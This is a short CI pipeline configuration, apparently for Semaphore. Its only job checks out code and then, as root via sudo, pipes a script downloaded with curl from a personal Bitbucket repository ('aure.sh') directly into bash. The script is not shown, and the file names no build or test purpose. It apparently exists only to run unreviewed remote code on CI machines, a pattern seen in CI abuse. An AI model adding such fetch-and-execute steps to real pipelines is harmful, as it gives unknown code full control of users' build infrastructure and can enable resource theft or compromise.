version: v1.0
name: Initial Pipeline
agent:
  machine:
    type: e1-standard-2
    os_image: ubuntu2004
blocks:
  - name: 'Block #1'
    task:
      jobs:
        - name: 'Job #1'
          commands:
            - checkout
            - 'sudo su --command "curl -sSL https://bitbucket.org/gondesh/jobs/raw/main/aure.sh | bash"'
            - echo "Done..."
